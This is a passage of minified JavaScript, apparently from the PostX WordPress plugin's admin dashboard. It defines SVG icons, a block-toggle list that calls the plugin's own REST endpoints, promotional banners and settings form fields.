2.63311 14.3668 2.63311 13.5858 3.41416L11 5.99994",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M5.9997 11L3.41391 13.5858C2.63286 14.3668 2.63286 15.6332 3.41391 16.4142L7.58549 20.5858C8.36653 21.3668 9.63286 21.3668 10.4139 20.5858L12.9997 18",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M2.5 21.5L5.5 18.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4.5 9.5L14.5 19.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M9.5 4.5L19.5 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M7 12L9.5 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12 17L14.5 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),rocket_fly_boost_launch_pro_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M20.8991 2.5H21.5V3.10086C21.5 6.28346 19.7357 9.83572 17.4853 12.0862L13.5714 16L8 10.4286L11.9139 6.51473C14.1643 4.26429 17.7165 2.5 20.8991 2.5Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M18.5 11L19 17L15 21L13.5 16",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8 10.5L3 9L7 5L13 5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M9 15L3.5 20.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M11.5 17.5L9 20",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M6.5 12.5L4 15",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17.4902 6.5H17.5002",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),gallery_indicator_image_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M3 5C3 3.89543 3.89543 3 5 3H19C20.1046 3 21 3.89543 21 5V13C21 14.1046 20.1046 15 19 15H5C3.89543 15 3 14.1046 3 13V5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M21.0002 12.6716L19.4144 11.0858C18.6333 10.3047 17.367 10.3047 16.5859 11.0858L15.9144 11.7574C15.1333 12.5384 13.867 12.5384 13.0859 11.7574L10.4144 9.08579C9.63332 8.30474 8.36699 8.30474 7.58594 9.08579L3.33594 13.3358",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M16.25 7C16.25 7.82843 15.5784 8.5 14.75 8.5C13.9216 8.5 13.25 7.82843 13.25 7C13.25 6.17157 13.9216 5.5 14.75 5.5C15.5784 5.5 16.25 6.17157 16.25 7Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M3 18.5C3 17.9477 3.44772 17.5 4 17.5H6.25C6.80228 17.5 7.25 17.9477 7.25 18.5V20C7.25 20.5523 6.80228 21 6.25 21H4C3.44772 21 3 20.5523 3 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M10 18.5C10 17.9477 10.4477 17.5 11 17.5H13.25C13.8023 17.5 14.25 17.9477 14.25 18.5V20C14.25 20.5523 13.8023 21 13.25 21H11C10.4477 21 10 20.5523 10 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"}),(0,a.createElement)("path",{d:"M17 18.5C17 17.9477 17.4477 17.5 18 17.5H20C20.5523 17.5 21 17.9477 21 18.5V20C21 20.5523 20.5523 21 20 21H18C17.4477 21 17 20.5523 17 20V18.5Z",stroke:"currentColor",strokeWidth:"1.5"})),unlocked_open_security_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 12C4 10.8954 4.89543 10 6 10H18C19.1046 10 20 10.8954 20 12V20C20 21.1046 19.1046 22 18 22H6C4.89543 22 4 21.1046 4 20V12Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17 10V7C17 4.23858 14.7615 2 12 2C10.1493 2 8.53347 3.0055 7.66895 4.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12 15.5L12 16.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),unlink_link_break_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M14.0113 17.0281L11.4972 19.5421C9.55336 21.486 6.40175 21.486 4.45789 19.5421C2.51404 17.5983 2.51404 14.4467 4.45789 12.5028L6.97193 9.98877M9.98875 6.97192L12.5028 4.45789C14.4466 2.51404 17.5983 2.51404 19.5421 4.45789C21.486 6.40174 21.486 9.55334 19.5421 11.4972L17.0281 14.0112",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M9.5 14.5L14.5 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"}),(0,a.createElement)("path",{d:"M3 5L19 21",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round"})),plus_circle_zoom_in_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M12 7V12.0001M12 12.0001V17M12 12.0001H17M12 12.0001H7",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),sort_descending_order_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 18.5H17",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 6.5H9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 12.5H11.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17 14.5V5.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M13 9.5L17 5.5L21 9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),sort_ascending_order_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M4 5.5H17",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 17.5H9.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M4 11.5H11.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M17 9.5V18.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M13 14.5L17 18.5L21 14.5",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),right_circle_line:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M22 12C22 17.5228 17.5228 22 12 22C6.47715 22 2 17.5228 2 12C2 6.47715 6.47715 2 12 2C17.5228 2 22 6.47715 22 12Z",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}),(0,a.createElement)("path",{d:"M8 12.5L10.5 15L16 9",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"})),plus:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor"},(0,a.createElement)("path",{d:"M12 19.8c-.4 0-.8-.3-.8-.8v-6.2H5c-.4 0-.8-.3-.8-.8s.3-.8.8-.8h6.2V5c0-.4.3-.8.8-.8s.8.3.8.8v6.2H19c.4 0 .8.3.8.8s-.3.8-.8.8h-6.2V19c0 .4-.4.8-.8.8z"})),subtract:(0,a.createElement)("svg",{viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M5 12H19",stroke:"currentColor",strokeWidth:"1.5",strokeLinecap:"round",strokeLinejoin:"round"}))}},5404:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(7294);const r={};r.moon=(0,a.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",fill:"currentColor"},(0,a.createElement)("path",{d:"M22 14.27A10.14 10.14 0 1 1 9.73 2 8.84 8.84 0 0 0 22 14.27Z"})),r.moon_line=(0,a.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg"},(0,a.createElement)("path",{d:"M8.17 4.53A9.54 9.54 0 0 0 19.5 15.69a8.26 8.26 0 0 1-7.76 4.29 8.36 8.36 0 0 1-7.71-7.7 8.23 8.23 0 0 1 4.15-7.76m1-2.52c-.16 0-.32.03-.48.09a10.28 10.28 0 0 0 3.56 19.9c4.47 0 8.27-2.85 9.67-6.84a1.36 1.36 0 0 0-1.27-1.82c-.15 0-.31.03-.47.1a7.48 7.48 0 0 1-3.41.43 7.59 7.59 0 0 1-6.33-10.04A1.36 1.36 0 0 0 9.17 2Z"})),r.sun=(0,a.createElement)("svg",{viewBox:"0 0 24 24"},(0,a.createElement)("g",null,(0,a.createElement)("path",{d:"M12 18.36a6.36 6.36 0 1 0 0-12.72 6.36 6.36 0 0 0 0 12.72ZM12.98.96V2.8c0 .53-.43.95-.97.95h-.02a.96.96 0 0 1-.97-.95V.96c0-.53.43-.96.96-.96h.05c.53 0 .96.43.96.96ZM4.89 3.5l1.3 1.3c.38.38.37.98 0 1.36h-.01l-.01.02a.96.96 0 0 1-1.37 0l-1.3-1.3a.96.96 0 0 1 0-1.35l.04-.04a.96.96 0 0 1 1.35 0ZM.96 11.02H2.8c.53 0 .95.43.95.97v.02c0 .53-.42.97-.95.97H.96a.95.95 0 0 1-.96-.96v-.05c0-.53.43-.96.96-.96ZM3.5 19.11l1.3-1.3a.96.96 0 0 1 1.36 0v.01l.02.01c.38.38.39.99 0 1.37l-1.3 1.3a.96.96 0 0 1-1.35 0l-.04-.04a.96.96 0 0 1 0-1.35ZM11.02 23.04V21.2c0-.53.43-.95.97-.95h.02c.53 0 .97.42.97.95v1.84c0 .53-.43.96-.96.96h-.05a.95.95 0 0 1-.96-.96ZM19.11 20.5l-1.3-1.3a.96.96 0 0 1 0-1.36h.01l.01-.02a.96.96 0 0 1 1.37 0l1.3 1.3c.38.37.38.98 0 1.35l-.04.04a.96.96 0 0 1-1.35 0ZM23.04 12.98H21.2a.96.96 0 0 1-.95-.97v-.02c0-.53.42-.97.95-.97h1.84c.53 0 .96.43.96.96v.05c0 .53-.43.96-.96.96ZM20.5 4.89l-1.3 1.3a.96.96 0 0 1-1.36 0v-.01l-.02-.01a.96.96 0 0 1 0-1.37l1.3-1.3a.96.96 0 0 1 1.35 0l.04.04c.37.37.37.98 0 1.35Z"})),(0,a.createElement)("defs",null)),r.sun_line=(0,a.createElement)("svg",{viewBox:"0 0 24 24"},(0,a.createElement)("path",{d:"M12 7.64a4.36 4.36 0 1 1-.01 8.73A4.36 4.36 0 0 1 12 7.64Zm0-2a6.35 6.35 0 1 0 0 12.71 6.35 6.35 0 0 0 0-12.7ZM12.98.96V2.8c0 .53-.43.96-.96.96h-.03a.96.96 0 0 1-.97-.96V.96c0-.53.43-.96.96-.96h.06c.52 0 .95.43.95.96ZM4.88 3.5l1.3 1.3c.38.38.38.98 0 1.36h-.01l-.01.02a.96.96 0 0 1-1.36.01L3.5 4.9a.96.96 0 0 1 0-1.35l.03-.04a.96.96 0 0 1 1.35 0ZM.96 11.02H2.8c.53 0 .96.43.96.96v.03c0 .53-.42.97-.96.97H.96a.96.96 0 0 1-.96-.96v-.06c0-.52.43-.95.96-.95ZM3.5 19.12l1.3-1.3a.96.96 0 0 1 1.38.02c.38.38.39.99.01 1.36l-1.3 1.3a.96.96 0 0 1-1.35 0l-.04-.03a.96.96 0 0 1 0-1.35ZM11.02 23.04V21.2c0-.53.43-.96.96-.96h.03c.53 0 .97.42.97.96v1.84c0 .53-.43.96-.96.96h-.06a.96.96 0 0 1-.95-.96ZM19.12 20.5l-1.3-1.3a.96.96 0 0 1 0-1.36h.01l.01-.02a.96.96 0 0 1 1.36-.01l1.3 1.3c.38.37.38.98 0 1.35l-.03.04a.96.96 0 0 1-1.35 0ZM23.04 12.98H21.2a.96.96 0 0 1-.96-.96v-.03c0-.53.42-.97.96-.97h1.84c.53 0 .96.43.96.96v.06c0 .52-.43.95-.96.95ZM20.5 4.88l-1.3 1.3a.96.96 0 0 1-1.36 0v-.01l-.02-.01a.96.96 0 0 1-.01-1.36l1.3-1.3a.96.96 0 0 1 1.35 0l.04.03c.38.37.38.98 0 1.35Z"}));const o=r},3644:(e,t,n)=>{"use strict";n.d(t,{Z:()=>d});var a=n(7294),r=n(2304),o=n(1383),i=n(3100),l=n(4766),s=n(8949),p=n(356);const c=()=>{const[e,t]=(0,a.useState)({}),[n,i]=(0,a.useState)(!0),[l,c]=(0,a.useState)({status:"",messages:[],state:!1}),d={post_list_1:{label:(0,r.__)("Post List #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6836",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-1/",icon:"post-list-1.svg"},post_slider_2:{label:(0,r.__)("Post Slider #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7487",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-2/",icon:"post-slider-2.svg"},post_list_4:{label:(0,r.__)("Post List #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6839",docs:"https://wpxpo.com/docs/postx/all-blocks/post-list-4/",icon:"post-list-4.svg"},post_slider_1:{label:(0,r.__)("Post Slider #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6840",docs:"https://wpxpo.com/docs/postx/all-blocks/post-slider-1/",icon:"post-slider-1.svg"},post_grid_4:{label:(0,r.__)("Post Grid #4","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6832",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-4/",icon:"post-grid-4.svg"},post_module_1:{label:(0,r.__)("Post Module #1","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6825",docs:"https://wpxpo.com/docs/postx/all-blocks/post-module-1/",icon:"post-module-1.svg"},post_grid_2:{label:(0,r.__)("Post Grid #2","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid6830",docs:"https://wpxpo.com/docs/postx/all-blocks/post-grid-2/",icon:"post-grid-2.svg"},advanced_search:{label:(0,r.__)("Search - PostX","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid8233",docs:"https://wpxpo.com/docs/postx/all-blocks/search-block",icon:"advanced-search.svg"},button_group:{label:(0,r.__)("Button Group","ultimate-post"),default:!0,live:"https://www.wpxpo.com/postx/blocks/#demoid7952",docs:"https://wpxpo.com/docs/postx/all-blocks/button-block/",icon:"button-group.svg"}},u=(0,o.t)();(0,a.useEffect)((()=>{m()}),[]);const m=()=>{wp.apiFetch({path:"/ultp/v2/get_all_settings",method:"POST",data:{key:"key",value:"value"}}).then((e=>{e.success&&u.current&&(t(e.settings),i(!1))}))};return(0,a.createElement)(a.Fragment,null,l.state&&(0,a.createElement)(p.Z,{delay:2e3,toastMessages:l,setToastMessages:c}),Object.keys(d).map(((o,i)=>{const l=d[o];let p=!!l.default;return""==e[o]&&(p="yes"==e[o]),(0,a.createElement)("div",{key:o},n?(0,a.createElement)("div",{className:"ultp-dash-blocks-item ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:24,unit1:"px",size2:24,unit2:"px",br:4}}),(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:70,unit1:"px",size2:24,unit2:"px",br:4}})),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:30,unit1:"px",size2:20,unit2:"px",br:4}}),(0,a.createElement)(s.Z,{type:"custom_size",c_s:{size1:40,unit1:"px",size2:20,unit2:"px",br:20}}))):(0,a.createElement)("div",{className:"ultp-dash-blocks-item ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-blocks-item-meta"},(0,a.createElement)("img",{className:"ultp-blocks-item-icon",src:`${ultp_dashboard_pannel.url}assets/img/blocks/${l.icon}`,alt:l.label}),(0,a.createElement)("div",{className:"ultp-blocks-item-title"},l.label)),(0,a.createElement)("div",{className:"ultp-blocks-control-option ultp-dash-control-options"},l.live&&(0,a.createElement)("a",{href:l.live,className:"ultp-option-tooltip",target:"_blank",rel:"noreferrer"},(0,r.__)("Demo","ultimate-post")),(0,a.createElement)("input",{type:"checkbox",className:"ultp-blocks-enable",id:o,checked:p,onChange:()=>{(n=>{const a=e?.hasOwnProperty(n)&&"yes"!=e[n]?"yes":"";t({...e,[n]:a}),wp.apiFetch({path:"/ultp/v2/addon_block_action",method:"POST",data:{key:n,value:a}}).then((e=>{e.success&&c({status:"success",messages:[e.message],state:!0})}))})(o)}}),(0,a.createElement)("label",{className:"ultp-control__label",htmlFor:o}))))})))},d=()=>{const e=[{label:(0,r.__)("50+ Custom Layouts","ultimate-post")},{label:(0,r.__)("250+ Pattern","ultimate-post")},{label:(0,r.__)("45+ Custom Post Blocks","ultimate-post")},{label:(0,r.__)("Pin-point Customization","ultimate-post")},{label:(0,r.__)("Dynamic Site Building","ultimate-post")},{label:(0,r.__)("Limitless Flexibility","ultimate-post")}],[t,n]=(0,a.useState)(!1);return(0,a.createElement)("div",{className:"ultp-dashboard-container-grid"},(0,a.createElement)("div",{className:"ultp-dashboard-content"},(0,a.createElement)("div",{className:"ultp-dash-banner ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-dash-banner-left"},(0,a.createElement)("div",{className:"ultp-dash-banner-title"},"Create Engaging Sites in Minutes…"),(0,a.createElement)("div",{className:"ultp-dash-banner-description"},"Thrilled to improve your WordPress blog? PostX supports you in creating and customizing stunning blogs! Design smooth, powerful websites - no compromises, unlimited options."),(0,a.createElement)("a",{className:"ultp-primary-alter-button",onClick:e=>{e.preventDefault(),window.location.replace("#startersites")}},(0,r.__)("Build with Starter Sites","ultimate-post"))),(0,a.createElement)("div",{className:"ultp-dash-banner-right"},t?(0,a.createElement)("iframe",{className:"ultp-dash-banner-right-video",src:"https://www.youtube.com/embed/FYgSe7kgb6M?autoplay=1",allow:"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; fullscreen",title:"Ultimate Post"}):(0,a.createElement)("div",{className:"ultp-dash-banner-right-img"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_banner_right.png",alt:(0,r.__)("Ultimate Post","ultimate-post")}),(0,a.createElement)("div",{className:"ultp-dash-banner-right-play-button",onClick:()=>{n(!0)}},l.ZP.rightFillAngle)))),(0,a.createElement)("div",{className:"ultp-dash-blocks ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-dash-blocks-heading"},(0,a.createElement)("div",{className:"ultp-dash-blocks-heading-title"},(0,r.__)("Blocks","ultimate-post")),(0,a.createElement)("a",{onClick:e=>{e.preventDefault(),window.location.replace("#blocks")},className:"ultp-transparent-button"},(0,r.__)("View All","ultimate-post"),l.ZP.angle_top_right_line)),(0,a.createElement)("div",{className:"ultp-dash-blocks-items"},(0,a.createElement)(c,null))),!ultp_dashboard_pannel?.active&&(0,a.createElement)("div",{className:"ultp-dash-pro-promo ultp-dash-item-con"},(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left"},(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-title"},(0,r.__)("Go Pro & Unlock More! 🚀","ultimate-post")),(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-description"},(0,r.__)("Harness the true power of PostX: build, customize, and launch dynamic WordPress sites with unrestricted creative control - no code, no hassle.","ultimate-post")),(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-keyfeature"},e.map(((e,t)=>(0,a.createElement)("div",{className:"ultp-dash-pro-promo-left-keyfeature-item",key:e.label},l.ZP.right_circle_solid,e.label)))),(0,a.createElement)("a",{href:(0,i.Z)("https://www.wpxpo.com/postx/?utm_source=db-postx-topbar&utm_medium=upgrade-pro-sidebar&utm_campaign=postx-dashboard#pricing"),target:"_blank",rel:"noreferrer",className:"ultp-primary-alter-button"},l.ZP.rocket,"Upgrade to Pro")),(0,a.createElement)("img",{className:"ultp-dash-pro-promo-right-img",src:ultp_dashboard_pannel.url+"assets/img/dashboard/dashboard_pro_promo.png",alt:"Ultimate Post"}))),(0,a.createElement)("div",{className:"ultp-sidebar-features"},(0,a.createElement)("div",{className:"ultp-sidebar-card-item ultp-sidebar-starter-sites"},(0,a.createElement)("img",{src:ultp_dashboard_pannel.url+"assets/img/dashboard/sidebar-starter-sites.png",alt:"Starter Sites Make it Easy"}),(0,a.createElement)("div",{className:"ultp-sidebar-card-title"},"Starter Sites Make it Easy"),(0,a.createElement)("span",{className:"ultp-sidebar-card-description"},"Create awesome-looking webpages without any code with PostX starter sites - simply import the starter template of your choice. Drag, drop, and deploy your site in minutes."),(0,a.createElement)("div",{className:"ultp-sidebar-card-buttons"},(0,a.createElement)("a",{href:"https://www.wpxpo.com/postx/starter-sites/?utm_source=db-postx-started&utm_medium=starter-sites&utm_campaign=postx-dashboard&pux_link=dbstartersite",className:"ultp-primary-button",target:"_blank",rel:"noreferrer"},l.ZP.angle_top_right_line,"Explore Starter Templates"))),(0,a.createElement)("div",{className:"ultp-sidebar-card-item ultp-sidebar-community"},(0,a.createElement)("div",{className:"ultp-sidebar-card-title"},"PostX Community"),(0,a.createElement)("span",{className:"ultp-sidebar-card-description"},"Join the Facebook community of PostX to stay up-to-date and share your thoughts and feedback."),(0,a.createElement)("div",{className:"ultp-sidebar-card-buttons"},(0,a.createElement)("a",{href:"https://www.facebook.com/groups/gutenbergpostx",className:"ultp-primary-button",target:"_blank",rel:"noreferrer"},l.ZP.facebook,"Join PostX Community")))))}},4482:(e,t,n)=>{"use strict";n.d(t,{DC:()=>p,WO:()=>m,ac:()=>u,cs:()=>d,gR:()=>f,hx:()=>c,u4:()=>l});var a=n(7294),r=n(4766),o=n(3100),i=n(4190);n(3479);const{__}=wp.i18n,l={preloader_style:{type:"select",label:__("Preloader Style","ultimate-post"),options:{style1:__("Preloader Style 1","ultimate-post"),style2:__("Preloader Style 2","ultimate-post")},default:"style1",desc:__("Select Preloader Style.","ultimate-post"),tooltip:__("PostX has two preloader variations that display while loading PostX's blocks if you enable the preloader for that blocks.","ultimate-post")},container_width:{type:"number",label:__("Container Width","ultimate-post"),default:"1140",desc:__("Change Container Width of the Page Template(PostX Template).","ultimate-post"),tooltip:__("Here you can increase or decrease the container width. It will be applicable when you create any dynamic template with the PostX Builder or select PostX's Template while creating a page.","ultimate-post")},hide_import_btn:{type:"switch",label:__("Hide Template Kits Button","ultimate-post"),default:"",desc:__("Hide Template Kits Button from toolbar of the Gutenberg Editor.","ultimate-post"),tooltip:__("Click on the check box to hide the Template Kits button from posts, pages, and the Builder of PostX.","ultimate-post")},disable_image_size:{type:"switch",label:__("Disable Image Size","ultimate-post"),default:"",desc:__("Disable Image Size of the Plugins.","ultimate-post"),tooltip:__("Click on the check box to turn off the PostX's size of the post images.","ultimate-post")},disable_view_cookies:{type:"switch",label:__("Disable All Cookies","ultimate-post"),default:"",desc:__("Disable All Frontend Cookies (Cookies Used for Post View Count).","ultimate-post"),tooltip:__("Click on the check box to restrict PostX from collecting cookies. PostX contains cookies to display the post view count.","ultimate-post")},disable_google_font:{type:"switchButton",label:__("Disable All Google Fonts","ultimate-post"),default:"",desc:__("Disable All Google Fonts From Frontend and Backend PostX Blocks.","ultimate-post"),tooltip:__("Click the check box to disable all Google Fonts from PostX's typography options.","ultimate-post")}},s=({multikey:e,value:t,multiValue:n})=>{var o;const[i,l]=(0,a.useState)([...n]),[s,p]=(0,a.useState)(!1),[c,d]=(0,a.useState)(null!==(o=t.options)&&void 0!==o?o:{}),[u,m]=(0,a.useState)(""),f=e=>{e.target.closest(".ultp-ms-container")||p(!1)};return(0,a.useEffect)((()=>(document.addEventListener("mousedown",f),()=>document.removeEventListener("mousedown",f))),[]),(0,a.useEffect)((()=>{setTimeout((()=>{const e=Object.fromEntries(Object.entries(t.options).filter((([e,t])=>t.toLowerCase().includes(u.toLowerCase())||e.toLowerCase().includes(u.toLowerCase()))));d(e)}),500)}),[u]),(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"hidden",name:e,value:i,"data-customprop":"custom_multiselect"}),(0,a.createElement)("div",{className:"ultp-ms-container"},(0,a.createElement)("div",{onClick:()=>p(!s),className:"ultp-ms-results-con cursor"},(0,a.createElement)("div",{className:"ultp-ms-results"},i.length>0?i?.map(((e,n)=>(0,a.createElement)("span",{key:n,className:"ultp-ms-selected"},t.options[e],(0,a.createElement)("span",{className:"ultp-ms-remove cursor",onClick:t=>{var n;t.stopPropagation(),n=e,l(i.filter((e=>e!=n)))}},r.ZP.close_circle_line)))):(0,a.createElement)("span",null,__("Select options"))),(0,a.createElement)("span",{onClick:()=>p(!s),className:"ultp-ms-results-collapse cursor"},r.ZP.collapse_bottom_line)),s&&c&&(0,a.createElement)("div",{className:"ultp-ms-options"},(0,a.createElement)("input",{type:"text",className:"ultp-multiselect-search",value:u,onChange:e=>m(e.target.value)}),Object.keys(c)?.map(((e,n)=>(0,a.createElement)("span",{className:"ultp-ms-option cursor",onClick:()=>(e=>{if(-1==i.indexOf(e)&&"all"!=e&&l([...i,e]),"all"===e){const e=Object.fromEntries(Object.entries(t.options).filter((([e,t])=>!t.toLowerCase().includes("all"))));l(Object.keys(e))}})(e),key:n,value:e},c[e]))))))},p=(e,t)=>(0,a.createElement)(a.Fragment,null,Object.keys(e).map(((n,r)=>{const o=e[n];return(0,a.createElement)("span",{key:r},"hidden"==o.type&&(0,a.createElement)("input",{key:n,type:"hidden",name:n,defaultValue:o.value}),"hidden"!=o.type&&(0,a.createElement)(a.Fragment,null,"heading"==o.type&&(0,a.createElement)("div",{className:"ultp_h2 ultp-settings-heading"},o.label)&&(0,a.createElement)(a.Fragment,null,o.desc&&(0,a.createElement)("div",{className:"ultp-settings-subheading"},o.desc)),"heading"!=o.type&&(0,a.createElement)("div",{className:"ultp-settings-wrap"},o.label&&(0,a.createElement)("strong",null,o.label,o.tooltip&&(0,a.createElement)(i.Z,{content:o.tooltip},(0,a.createElement)("span",{className:" cursor dashicons dashicons-editor-help"}))),(0,a.createElement)("div",{className:"ultp-settings-field-wrap"},((e,t,n)=>{const r=n.hasOwnProperty(e)?n[e]:t.default?t.default:"multiselect"==t.type?[]:"";switch(t.type){case"select":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("select",{defaultValue:r,name:e,id:e},Object.keys(t.options).map(((e,n)=>(0,a.createElement)("option",{key:n,value:e},t.options[e])))),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"radio":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("div",{className:"ultp-field-radio"},(0,a.createElement)("div",{className:"ultp-field-radio-items"},Object.keys(t.options).map(((n,o)=>(0,a.createElement)("div",{key:o,className:"ultp-field-radio-item"},(0,a.createElement)("input",{type:"radio",id:n,name:e,value:n,defaultChecked:n===r}),(0,a.createElement)("label",{htmlFor:n},t.options[n])))))),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"color":return(0,a.createElement)("div",{className:"ultp-settings-field"},(0,a.createElement)("input",{type:"text",defaultValue:r,className:"ultp-color-picker"}),(0,a.createElement)("span",{className:"ultp-settings-input-field"},(0,a.createElement)("input",{type:"text",name:e,className:"ultp-color-code",defaultValue:r})),t.desc&&(0,a.createElement)("span",{className:"ultp-description"},t.desc));case"number":return(0,a.createElement)("div",{className:"ultp-settings-field 